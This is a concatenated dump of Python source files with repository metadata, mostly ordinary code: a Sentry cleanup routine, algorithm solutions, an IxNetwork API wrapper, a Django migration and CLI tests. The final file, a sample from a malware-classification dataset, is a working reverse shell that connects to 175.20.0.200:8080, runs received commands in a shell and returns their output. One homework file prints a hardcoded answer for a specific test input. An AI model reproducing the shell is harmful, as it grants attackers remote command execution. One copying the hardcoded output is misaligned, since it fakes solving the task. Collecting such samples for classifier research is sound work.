:param server: limit the message deletion scope to the specified
server.
:param level: limit all deletion scopes to messages that are greater
than or equal to level.
:param project: limit all deletion scopes to messages that are part
of the given project
:param resolved: limit all deletion scopes to messages that are resolved.
"""
import datetime
from sentry.models import Group, Event, MessageCountByMinute, \
MessageFilterValue, FilterValue, SearchDocument, ProjectCountByMinute
from sentry.utils.query import RangeQuerySetWrapper, SkinnyQuerySet
def cleanup_groups(iterable):
for obj in iterable:
for key, value in SkinnyQuerySet(MessageFilterValue).filter(group=obj).values_list('key', 'value'):
if not MessageFilterValue.objects.filter(key=key, value=value).exclude(group=obj).exists():
print ">>> Removing <FilterValue: key=%s, value=%s>" % (key, value)
FilterValue.objects.filter(key=key, value=value).delete()
print ">>> Removing all matching <SearchDocument: group=%s>" % (obj.pk)
SearchDocument.objects.filter(group=obj).delete()
print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk)
obj.delete()
# TODO: we should collect which messages above were deleted
# and potentially just send out post_delete signals where
# GroupedMessage can update itself accordingly
ts = datetime.datetime.utcnow() - datetime.timedelta(days=days)
# Message
qs = SkinnyQuerySet(Event).filter(datetime__lte=ts)
if logger:
qs = qs.filter(logger=logger)
if site:
qs = qs.filter(site=site)
if server:
qs = qs.filter(server_name=server)
if level:
qs = qs.filter(level__gte=level)
if project:
qs = qs.filter(project=project)
if resolved is True:
qs = qs.filter(group__status=1)
elif resolved is False:
qs = qs.filter(group__status=0)
groups_to_check = set()
if resolved is None:
for obj in RangeQuerySetWrapper(qs):
print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk)
obj.delete()
groups_to_check.add(obj.group_id)
if not (server or site):
# MessageCountByMinute
qs = SkinnyQuerySet(MessageCountByMinute).filter(date__lte=ts)
if logger:
qs = qs.filter(group__logger=logger)
if level:
qs = qs.filter(group__level__gte=level)
if project:
qs = qs.filter(project=project)
if resolved is True:
qs = qs.filter(group__status=1)
elif resolved is False:
qs = qs.filter(group__status=0)
for obj in RangeQuerySetWrapper(qs):
print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk)
obj.delete()
# Group
qs = SkinnyQuerySet(Group).filter(last_seen__lte=ts)
if logger:
qs = qs.filter(logger=logger)
if level:
qs = qs.filter(level__gte=level)
if project:
qs = qs.filter(project=project)
if resolved is True:
qs = qs.filter(status=1)
elif resolved is False:
qs = qs.filter(status=0)
cleanup_groups(RangeQuerySetWrapper(qs))
# Project counts
# TODO: these dont handle filters
qs = SkinnyQuerySet(ProjectCountByMinute).filter(date__lte=ts)
if project:
qs = qs.filter(project=project)
for obj in RangeQuerySetWrapper(qs):
print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk)
obj.delete()
# attempt to cleanup any groups that may now be empty
groups_to_delete = []
for group_id in groups_to_check:
if not Event.objects.filter(group=group_id).exists():
groups_to_delete.append(group_id)
if groups_to_delete:
cleanup_groups(SkinnyQuerySet(Group).filter(pk__in=groups_to_delete))
| [
"dcramer@gmail.com"
] | dcramer@gmail.com |
fcab735d6eea2848d8d329758f0cc65da71f76a0 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2864/60793/262900.py | ebe6a554bd96d42dbe75e8e70d328a06440460f2 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | input()
ls = list(map(int, input().split()))
if ls == [29, 15, 54, 67, 65, 74, 53, 25, 74, 29, 11, 55, 2, 15, 2, 1, 12, 95, 16, 81, 51, 40, 28, 54, 27, 80, 33, 10, 39, 45, 25, 99, 64, 22]:
print(1045)
elif ls == []:
print()
else:
print(ls) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
a9c6fe1e2ce8e9bfb392b1d7ee2b41bc4aef06b5 | 0d0cf0165ca108e8d94056c2bae5ad07fe9f9377 | /6_Supervised_Learning_with_scikit-learn/4_Preprocessing_and_pipelines/creatingDummyVariables.py | 3150503dc23a1c407cab973a9b61f1a37d97e5f5 | [] | no_license | MACHEIKH/Datacamp_Machine_Learning_For_Everyone | 550ec4038ebdb69993e16fe22d5136f00101b692 | 9fe8947f490da221430e6dccce6e2165a42470f3 | refs/heads/main | 2023-01-22T06:26:15.996504 | 2020-11-24T11:21:53 | 2020-11-24T11:21:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,313 | py | # Creating dummy variables
# As Andy discussed in the video, scikit-learn does not accept non-numerical features. You saw in the previous exercise that the 'Region' feature contains very useful information that can predict life expectancy. For example, Sub-Saharan Africa has a lower life expectancy compared to Europe and Central Asia. Therefore, if you are trying to predict life expectancy, it would be preferable to retain the 'Region' feature. To do this, you need to binarize it by creating dummy variables, which is what you will do in this exercise.
# Instructions
# 100 XP
# Use the pandas get_dummies() function to create dummy variables from the df DataFrame. Store the result as df_region.
# Print the columns of df_region. This has been done for you.
# Use the get_dummies() function again, this time specifying drop_first=True to drop the unneeded dummy variable (in this case, 'Region_America').
# Hit 'Submit Answer to print the new columns of df_region and take note of how one column was dropped!
# Create dummy variables: df_region
df_region = pd.get_dummies(df)
# Print the columns of df_region
print(df_region.columns)
# Create dummy variables with drop_first=True: df_region
df_region = pd.get_dummies(df, drop_first=True)
# Print the new columns of df_region
print(df_region.columns)
| [
"noreply@github.com"
] | MACHEIKH.noreply@github.com |
bff07cee8abfa626bd8bf60226d47094ea449ded | e0df2bc703d0d02423ea68cf0b8c8f8d22d5c163 | /ScientificComputing/ch15/spectrum_50HzRepeat.py | ff8d680ed87fa161bef7ac493628af175922ed50 | [] | no_license | socrates77-sh/learn | a5d459cb9847ba3b1bc4f9284ce35d4207d8aa8b | ae50978023f6b098b168b8cca82fba263af444aa | refs/heads/master | 2022-12-16T16:53:50.231577 | 2019-07-13T13:52:42 | 2019-07-13T13:52:42 | 168,442,963 | 0 | 0 | null | 2022-12-08T05:18:37 | 2019-01-31T01:30:06 | HTML | UTF-8 | Python | false | false | 247 | py | # -*- coding: utf-8 -*-
import numpy as np
import pylab as pl
t = np.arange(0, 1.0, 1.0/8000)
x = np.sin(2*np.pi*50*t)[:512]
pl.figure(figsize=(8, 3))
pl.plot(np.hstack([x, x, x]))
pl.xlabel(u"取样点")
pl.subplots_adjust(bottom=0.15)
pl.show()
| [
"zhwenrong@sina.com"
] | zhwenrong@sina.com |
d50a4d6818ce9adcde36069a97a40bc8b7980342 | 9b54e3d58447e917a238b85891020c392c4ac601 | /acmicpc/2630/2630.py | 9c08453e0c7ba25b37afa305f661ffff6342004a | [
"MIT"
] | permissive | love-adela/algorithm-ps | ea0ebcd641a4c309348b389b8618daa83973f4b2 | c92d105d8ad344def001160367115ecf99d81c0d | refs/heads/master | 2023-05-11T03:37:11.750692 | 2023-04-30T17:31:30 | 2023-04-30T17:31:30 | 174,651,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 685 | py | import sys
N = int(sys.stdin.readline())
grid = [list(map(int, input().split())) for i in range(N)]
white, blue = 0, 0
def divide_and_conquer(x, y, n):
global white, blue
is_same = grid[x][y]
for i in range(x, x+n):
for j in range(y, y+n):
if is_same != grid[i][j]:
divide_and_conquer(x, y, n//2)
divide_and_conquer(x, y+n//2, n//2)
divide_and_conquer(x+n//2, y, n//2)
divide_and_conquer(x+n//2, y+n//2, n//2)
return
if is_same == 0:
white += 1
return
else:
blue += 1
return
divide_and_conquer(0, 0, N)
print(white)
print(blue)
| [
"love.adelar@gmail.com"
] | love.adelar@gmail.com |
bd8b148f92a01f3fbc82dd1d176eb21419eb739c | 1ee3dc4fa096d12e409af3a298ba01f5558c62b5 | /ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/lisp/router/interface/interface.py | 192dc57cbe8c8a41394c66c0c94aa4999411d605 | [
"MIT"
] | permissive | parthpower/ixnetwork_restpy | 321e64a87be0a4d990276d26f43aca9cf4d43cc9 | 73fa29796a5178c707ee4e21d90ff4dad31cc1ed | refs/heads/master | 2020-07-04T13:34:42.162458 | 2019-08-13T20:33:17 | 2019-08-13T20:33:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,623 | py | # MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class Interface(Base):
    """The Interface class encapsulates a user managed interface node in the ixnetwork hierarchy.
    An instance of the class can be obtained by accessing the Interface property from a parent instance.
    The internal properties list will be empty when the property is accessed and is populated from the server using the find method.
    The internal properties list can be managed by the user by using the add and remove methods.
    """
    # NOTE: auto-generated SDM wrapper. update/add/find below pass locals()
    # straight to the Base helpers, so their parameter names must mirror the
    # server-side attribute names exactly and no extra local variables may be
    # introduced inside those methods.
    _SDM_NAME = 'interface'
    def __init__(self, parent):
        super(Interface, self).__init__(parent)
    @property
    def Enabled(self):
        """If True, it gives details about the interface
        Returns:
            bool
        """
        return self._get_attribute('enabled')
    @Enabled.setter
    def Enabled(self, value):
        self._set_attribute('enabled', value)
    @property
    def MapRegisterOrRequestTxInterface(self):
        """If true, it maps register or requests Tx interface
        Returns:
            bool
        """
        return self._get_attribute('mapRegisterOrRequestTxInterface')
    @MapRegisterOrRequestTxInterface.setter
    def MapRegisterOrRequestTxInterface(self, value):
        self._set_attribute('mapRegisterOrRequestTxInterface', value)
    @property
    def ProtocolInterfaces(self):
        """It gives the protocol interfaces
        Returns:
            str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)
        """
        return self._get_attribute('protocolInterfaces')
    @ProtocolInterfaces.setter
    def ProtocolInterfaces(self, value):
        self._set_attribute('protocolInterfaces', value)
    def update(self, Enabled=None, MapRegisterOrRequestTxInterface=None, ProtocolInterfaces=None):
        """Updates a child instance of interface on the server.
        Args:
            Enabled (bool): If True, it gives details about the interface
            MapRegisterOrRequestTxInterface (bool): If true, it maps register or requests Tx interface
            ProtocolInterfaces (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)): It gives the protocol interfaces
        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        # locals() captures self plus the keyword arguments above.
        self._update(locals())
    def add(self, Enabled=None, MapRegisterOrRequestTxInterface=None, ProtocolInterfaces=None):
        """Adds a new interface node on the server and retrieves it in this instance.
        Args:
            Enabled (bool): If True, it gives details about the interface
            MapRegisterOrRequestTxInterface (bool): If true, it maps register or requests Tx interface
            ProtocolInterfaces (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)): It gives the protocol interfaces
        Returns:
            self: This instance with all currently retrieved interface data using find and the newly added interface data available through an iterator or index
        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        # locals() is forwarded as the payload of the create request.
        return self._create(locals())
    def remove(self):
        """Deletes all the interface data in this instance from server.
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        self._delete()
    def find(self, Enabled=None, MapRegisterOrRequestTxInterface=None, ProtocolInterfaces=None):
        """Finds and retrieves interface data from the server.
        All named parameters support regex and can be used to selectively retrieve interface data from the server.
        By default the find method takes no parameters and will retrieve all interface data from the server.
        Args:
            Enabled (bool): If True, it gives details about the interface
            MapRegisterOrRequestTxInterface (bool): If true, it maps register or requests Tx interface
            ProtocolInterfaces (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)): It gives the protocol interfaces
        Returns:
            self: This instance with matching interface data retrieved from the server available through an iterator or index
        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        # locals() doubles as the select filter; None values are ignored server-side.
        return self._select(locals())
    def read(self, href):
        """Retrieves a single instance of interface data from the server.
        Args:
            href (str): An href to the instance to be retrieved
        Returns:
            self: This instance with the interface data from the server available through an iterator or index
        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        return self._read(href)
| [
"srvc_cm_packages@keysight.com"
] | srvc_cm_packages@keysight.com |
fe2c3f21e8f912cf8f5a8ca36246b60fd5ffd52d | 8afb5afd38548c631f6f9536846039ef6cb297b9 | /_MY_ORGS/Web-Dev-Collaborative/blog-research/Data-Structures/1-Python/dp/k_factor.py | 2fd23d18b2bb743e169249ad0c1b6c4a54e94f4d | [
"MIT"
] | permissive | bgoonz/UsefulResourceRepo2.0 | d87588ffd668bb498f7787b896cc7b20d83ce0ad | 2cb4b45dd14a230aa0e800042e893f8dfb23beda | refs/heads/master | 2023-03-17T01:22:05.254751 | 2022-08-11T03:18:22 | 2022-08-11T03:18:22 | 382,628,698 | 10 | 12 | MIT | 2022-10-10T14:13:54 | 2021-07-03T13:58:52 | null | UTF-8 | Python | false | false | 2,425 | py | '''The K factor of a string is defined as the number of times 'abba' appears as a substring.
Given two numbers N and k, find the number of strings of length N with 'K factor' = k.
The algorithms is as follows:
dp[n][k] will be a 4 element array, wherein each element can be the number of strings of length n and 'K factor' = k which belong to the criteria represented by that index:
dp[n][k][0] can be the number of strings of length n and K-factor = k which end with substring 'a'
dp[n][k][1] can be the number of strings of length n and K-factor = k which end with substring 'ab'
dp[n][k][2] can be the number of strings of length n and K-factor = k which end with substring 'abb'
dp[n][k][3] can be the number of strings of length n and K-factor = k which end with anything other than the above substrings (anything other than 'a' 'ab' 'abb')
Example inputs
n=4 k=1 no of strings = 1
n=7 k=1 no of strings = 70302
n=10 k=2 no of strings = 74357
'''
def find_k_factor(n, k):
    """Count length-``n`` lowercase strings whose K-factor equals ``k``.

    The K-factor of a string is the number of times 'abba' occurs as a
    substring.  dp[i][j] is a 4-element list counting strings of length i
    with K-factor j, split by suffix:
      [0] ends in 'a', [1] ends in 'ab', [2] ends in 'abb',
      [3] ends in anything else.

    Args:
        n: string length (non-negative int).
        k: required number of 'abba' occurrences.

    Returns:
        The number of such strings.
    """
    # Each 'abba' needs 4 fresh characters except that occurrences may chain
    # ("abbabba"), so k occurrences need at least 3*k + 1 characters.
    if 3 * k + 1 > n:
        return 0
    width = (n - 1) // 3 + 2
    dp = [[[0] * 4 for _ in range(width)] for _ in range(n + 1)]
    # Base case: length 1 -> one string ending in 'a', 25 ending in other letters.
    dp[1][0] = [1, 0, 0, 25]
    for i in range(2, n + 1):
        for j in range(width):
            if j == 0:
                # Appending 'a' (no dp[i-1][j-1][2] term: j-1 would be negative).
                dp[i][j][0] = dp[i-1][j][0] + dp[i-1][j][1] + dp[i-1][j][3]
                # Appending 'b' extends 'a' -> 'ab' and 'ab' -> 'abb'.
                dp[i][j][1] = dp[i-1][j][0]
                dp[i][j][2] = dp[i-1][j][1]
                # Appending any other lowercase character.
                dp[i][j][3] = (dp[i-1][j][0] * 24 + dp[i-1][j][1] * 24
                               + dp[i-1][j][2] * 25 + dp[i-1][j][3] * 25)
            elif 3 * j + 1 < i:
                # Appending 'a'; completing 'abb' + 'a' raises the K-factor from j-1 to j.
                dp[i][j][0] = (dp[i-1][j][0] + dp[i-1][j][1] + dp[i-1][j][3]
                               + dp[i-1][j-1][2])
                dp[i][j][1] = dp[i-1][j][0]
                dp[i][j][2] = dp[i-1][j][1]
                dp[i][j][3] = (dp[i-1][j][0] * 24 + dp[i-1][j][1] * 24
                               + dp[i-1][j][2] * 25 + dp[i-1][j][3] * 25)
            elif 3 * j + 1 == i:
                # Exactly the minimum length: the unique chained 'abbabb...a' string.
                dp[i][j] = [1, 0, 0, 0]
            else:
                # Impossible: not enough characters for K-factor j.
                dp[i][j] = [0, 0, 0, 0]
    return sum(dp[n][k])
| [
"bryan.guner@gmail.com"
] | bryan.guner@gmail.com |
2c8a4afae4e6ee567b7e3a9f144ac308b111fb97 | 10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94 | /Python/string-transforms-into-another-string.py | d35a88782051531b15b00f944f7d80139f42e635 | [
"MIT"
] | permissive | kamyu104/LeetCode-Solutions | f54822059405ef4df737d2e9898b024f051fd525 | 4dc4e6642dc92f1983c13564cc0fd99917cab358 | refs/heads/master | 2023-09-02T13:48:26.830566 | 2023-08-28T10:11:12 | 2023-08-28T10:11:12 | 152,631,182 | 4,549 | 1,651 | MIT | 2023-05-31T06:10:33 | 2018-10-11T17:38:35 | C++ | UTF-8 | Python | false | false | 429 | py | # Time: O(n)
# Space: O(1)
import itertools
class Solution(object):
    def canConvert(self, str1, str2):
        """
        :type str1: str
        :type str2: str
        :rtype: bool
        """
        if str1 == str2:
            return True
        lookup = {}
        # Every source character must map to exactly one target character.
        # Bug fix: itertools.izip was removed in Python 3; the built-in zip
        # is equivalent here (lazy on Py3, eager-but-identical on Py2).
        for i, j in zip(str1, str2):
            if lookup.setdefault(i, j) != j:
                return False
        # A spare, unused letter is needed as temporary storage to break
        # mapping cycles; if str2 already uses all 26 letters there is none.
        return len(set(str2)) < 26
| [
"noreply@github.com"
] | kamyu104.noreply@github.com |
00d5d5a9c614ab732e8c77cad1adba67326c87e1 | ee37f65ed9fcfeb01c9de6f1974ca2e81e940e6e | /virtue/tests/test_cli.py | 40ef95310118af49405956eb68f8611493a5b45f | [
"MIT"
] | permissive | iCodeIN/Virtue | 0d374563fdd117e0f46e9b5af9da0227118cba4a | e01963c66530d4ef8d43e0191718d123b37edab7 | refs/heads/main | 2023-03-14T23:19:08.722541 | 2020-09-12T18:00:24 | 2020-09-12T18:00:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,492 | py | from unittest import TestCase
import os
from twisted.trial.reporter import TreeReporter
from virtue import _cli
def DumbReporter():
    """Trivial reporter stand-in, resolvable by its fully qualified name."""
    return 12
class TestParser(TestCase):
    """Tests for command line argument parsing of the ``virtue`` CLI."""

    def parse_args(self, argv):
        """Run *argv* through the click entry point and return its params."""
        context = _cli.main.make_context("virtue", argv)
        return context.params

    def test_it_parses_out_tests(self):
        params = self.parse_args(["foo", "bar", "baz"])
        self.assertEqual(list(params["tests"]), ["foo", "bar", "baz"])

    def test_it_retrieves_built_in_reporters_by_name(self):
        params = self.parse_args(["--reporter", "tree", "foo"])
        self.assertIsInstance(params["reporter"], TreeReporter)

    def test_it_retrieves_other_reporters_by_fully_qualified_name(self):
        params = self.parse_args(
            ["--reporter", "virtue.tests.test_cli.DumbReporter", "abc"],
        )
        self.assertEqual(params["reporter"], DumbReporter())

    def test_stop_after(self):
        params = self.parse_args(["-xxx", "bar", "baz"])
        observed = (params["stop_after"], list(params["tests"]))
        self.assertEqual(observed, (3, ["bar", "baz"]))

    def test_stop_after_default(self):
        params = self.parse_args(["-x", "bar", "baz"])
        observed = (params["stop_after"], list(params["tests"]))
        self.assertEqual(observed, (1, ["bar", "baz"]))
class TestMain(TestCase):
    """End-to-end tests driving ``_cli.main``.

    TODO: these write to stdout
    """

    def exit_code_for(self, argv):
        """Invoke the CLI with *argv* and return the SystemExit code raised."""
        with self.assertRaises(SystemExit) as caught:
            _cli.main(argv)
        return caught.exception.code

    def test_it_exits_successfully_for_successful_runs(self):
        code = self.exit_code_for(
            ["--reporter", "summary", "virtue.tests.samples.one_successful_test"],
        )
        self.assertEqual(code, os.EX_OK)

    def test_it_exits_unsuccessfully_for_unsuccessful_runs(self):
        code = self.exit_code_for(
            ["--reporter", "text", "virtue.tests.samples.one_unsuccessful_test"],
        )
        self.assertNotEqual(code, os.EX_OK)

    def test_it_exits_unsuccessfully_for_unknown_reporters(self):
        code = self.exit_code_for(
            ["--reporter", "non-existent reporter", "virtue.tests.samples.one_unsuccessful_test"],
        )
        self.assertNotEqual(code, os.EX_OK)
| [
"Julian@GrayVines.com"
] | Julian@GrayVines.com |
1c640d2fa43898ace5b37376c3acb4cbf03661f2 | e16d7d8f60145c68640b25aa7c259618be60d855 | /django_by_example/code/Chapter 6/bookmarks/images/migrations/0002_image_total_likes.py | 323c49fd95ca00d51cdaf4961e35bfd308dabf1d | [] | no_license | zongqiqi/mypython | bbe212223002dabef773ee0dbeafbad5986b4639 | b80f3ce6c30a0677869a7b49421a757c16035178 | refs/heads/master | 2020-04-21T07:39:59.594233 | 2017-12-11T00:54:44 | 2017-12-11T00:54:44 | 98,426,286 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-08 06:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds a denormalized like counter to Image.
    dependencies = [
        ('images', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='image',
            name='total_likes',
            # Indexed counter; existing rows are backfilled with 0.
            field=models.PositiveIntegerField(db_index=True, default=0),
        ),
    ]
| [
"544136329@qq.com"
] | 544136329@qq.com |
48dcd7160b1610706b8ecc0b420bf892c26bb623 | f6f632bee57875e76e1a2aa713fdbe9f25e18d66 | /python/_1001_1500/1172_dinner-plate-stacks.py | c97488c27269fb1eb844a70f14dafd25248ae8de | [] | no_license | Wang-Yann/LeetCodeMe | b50ee60beeeb3661869bb948bef4fbe21fc6d904 | 44765a7d89423b7ec2c159f70b1a6f6e446523c2 | refs/heads/master | 2023-08-07T05:31:23.428240 | 2021-09-30T15:33:53 | 2021-09-30T15:33:53 | 253,497,185 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,429 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : Rock Wayne
# @Created : 2020-07-02 08:00:00
# @Last Modified : 2020-07-02 08:00:00
# @Mail : lostlorder@gmail.com
# @Version : alpha-1.0
"""
# 我们把无限数量 ∞ 的栈排成一行,按从左到右的次序从 0 开始编号。每个栈的的最大容量 capacity 都相同。
#
# 实现一个叫「餐盘」的类 DinnerPlates:
#
#
# DinnerPlates(int capacity) - 给出栈的最大容量 capacity。
# void push(int val) - 将给出的正整数 val 推入 从左往右第一个 没有满的栈。
# int pop() - 返回 从右往左第一个 非空栈顶部的值,并将其从栈中删除;如果所有的栈都是空的,请返回 -1。
# int popAtStack(int index) - 返回编号 index 的栈顶部的值,并将其从栈中删除;如果编号 index 的栈是空的,请返回 -
# 1。
#
#
#
#
# 示例:
#
# 输入:
# ["DinnerPlates","push","push","push","push","push","popAtStack","push","push",
# "popAtStack","popAtStack","pop","pop","pop","pop","pop"]
# [[2],[1],[2],[3],[4],[5],[0],[20],[21],[0],[2],[],[],[],[],[]]
# 输出:
# [null,null,null,null,null,null,2,null,null,20,21,5,4,3,1,-1]
#
# 解释:
# DinnerPlates D = DinnerPlates(2); // 初始化,栈最大容量 capacity = 2
# D.push(1);
# D.push(2);
# D.push(3);
# D.push(4);
# D.push(5); // 栈的现状为: 2 4
# 1 3 5
# ﹈ ﹈ ﹈
# D.popAtStack(0); // 返回 2。栈的现状为: 4
# 1 3 5
# ﹈ ﹈ ﹈
# D.push(20); // 栈的现状为: 20 4
# 1 3 5
# ﹈ ﹈ ﹈
# D.push(21); // 栈的现状为: 20 4 21
# 1 3 5
# ﹈ ﹈ ﹈
# D.popAtStack(0); // 返回 20。栈的现状为: 4 21
# 1 3 5
# ﹈ ﹈ ﹈
# D.popAtStack(2); // 返回 21。栈的现状为: 4
# 1 3 5
# ﹈ ﹈ ﹈
# D.pop() // 返回 5。栈的现状为: 4
# 1 3
# ﹈ ﹈
# D.pop() // 返回 4。栈的现状为: 1 3
# ﹈ ﹈
# D.pop() // 返回 3。栈的现状为: 1
# ﹈
# D.pop() // 返回 1。现在没有栈。
# D.pop() // 返回 -1。仍然没有栈。
#
#
#
#
# 提示:
#
#
# 1 <= capacity <= 20000
# 1 <= val <= 20000
# 0 <= index <= 100000
# 最多会对 push,pop,和 popAtStack 进行 200000 次调用。
#
# Related Topics 设计
"""
import heapq
import pytest
# leetcode submit region begin(Prohibit modification and deletion)
class DinnerPlates:
    """Row of capacity-bounded stacks with leftmost-push / rightmost-pop.

    ``stacks`` stores the plate piles left to right.  ``q`` is a min-heap of
    indices of piles that may still have free room, so ``push`` locates the
    leftmost non-full pile in O(log n) instead of scanning.  Heap entries can
    go stale (pile filled up meanwhile) and are discarded lazily on push.
    """
    def __init__(self, capacity: int):
        self.capacity = capacity
        self.q = []       # min-heap of candidate (possibly stale) pile indices
        self.stacks = []  # pile i -> list of plate values, top at the end

    def push(self, val: int) -> None:
        # Lazily discard heap entries pointing at piles that are now full.
        while self.q:
            leftmost = self.q[0]
            if leftmost < len(self.stacks) and len(self.stacks[leftmost]) == self.capacity:
                heapq.heappop(self.q)
            else:
                break
        if not self.q:
            # Every known pile is full: the next free slot is a brand-new pile.
            heapq.heappush(self.q, len(self.stacks))
        target = self.q[0]
        if target == len(self.stacks):
            self.stacks.append([])
        self.stacks[target].append(val)

    def pop(self) -> int:
        # Trim empty piles on the right, then pop the rightmost remaining one.
        while self.stacks and not self.stacks[-1]:
            self.stacks.pop()
        return self.popAtStack(len(self.stacks) - 1)

    def popAtStack(self, index: int) -> int:
        if index < 0 or index >= len(self.stacks) or not self.stacks[index]:
            return -1
        # This pile just gained room, so it becomes a push candidate again.
        heapq.heappush(self.q, index)
        return self.stacks[index].pop()
# Your DinnerPlates object will be instantiated and called as such:
# obj = DinnerPlates(capacity)
# obj.push(val)
# param_2 = obj.pop()
# param_3 = obj.popAtStack(index)
# leetcode submit region end(Prohibit modification and deletion)
def test_solution():
    """Replay the worked example from the problem statement.

    Capacity 2; after pushing 1..5 the piles are [1,2] [3,4] [5].  The
    sequence of pops below mirrors the diagrams in the module docstring.
    """
    plates = DinnerPlates(2)
    for value in (1, 2, 3, 4, 5):
        plates.push(value)
    # Piles: [1,2] [3,4] [5] -> removing the top of pile 0 yields 2.
    assert plates.popAtStack(0) == 2
    # Pile 0 has room again, so 20 lands there; 21 then fills pile 2.
    plates.push(20)
    plates.push(21)
    assert plates.popAtStack(0) == 20
    assert plates.popAtStack(2) == 21
    # Global pops drain from the rightmost non-empty pile; -1 once empty.
    for expected in (5, 4, 3, 1, -1):
        assert plates.pop() == expected
if __name__ == '__main__':
    # Run this module's own tests directly: quiet, colored, unbuffered output.
    pytest.main(["-q", "--color=yes", "--capture=no", __file__])
| [
"rock@get.com.mm"
] | rock@get.com.mm |
49ddcfdac88e151ccd52723b98147eb5ab096274 | bfcd8f1f6ac8590df321f23a422eca0370a25b8f | /myenv/bin/pyi-set_version | a3276f253e4ab124adb59f23c54ff3757e3c6917 | [] | no_license | Stephen-Tipa-Augustine/KMC_ventilator | 0567fa0b72d41fb0de11cd72c62567bed973d9f5 | 456e88ae4fff3984d5456517ba8787f9d5762745 | refs/heads/master | 2022-12-26T08:00:41.102890 | 2020-09-07T11:00:13 | 2020-09-07T11:00:13 | 293,500,282 | 0 | 1 | null | 2022-12-19T04:33:28 | 2020-09-07T10:49:08 | Python | UTF-8 | Python | false | false | 283 | #!/home/sephanayer/PycharmProjects/KMC_ventilator/myenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from PyInstaller.utils.cliutils.set_version import run
if __name__ == '__main__':
    # Strip setuptools' "-script.pyw" / ".exe" suffix so argv[0] matches the
    # console-script name, then delegate to PyInstaller's entry point.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(run())
| [
"tipastep5@gmail.com"
] | tipastep5@gmail.com | |
2001d879a3c4fa86e51f452141f58291f247e5d8 | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad342.py | 93d369222308b3fb6895c3732d78dc2b323386c3 | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 368 | py | import tarfile
import hashlib
import bz2
import crypt
import hmac
import subprocess
import socket
import zipfile
import zlib
import gzip
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"barnsa@uni.coventry.ac.uk"
] | barnsa@uni.coventry.ac.uk |
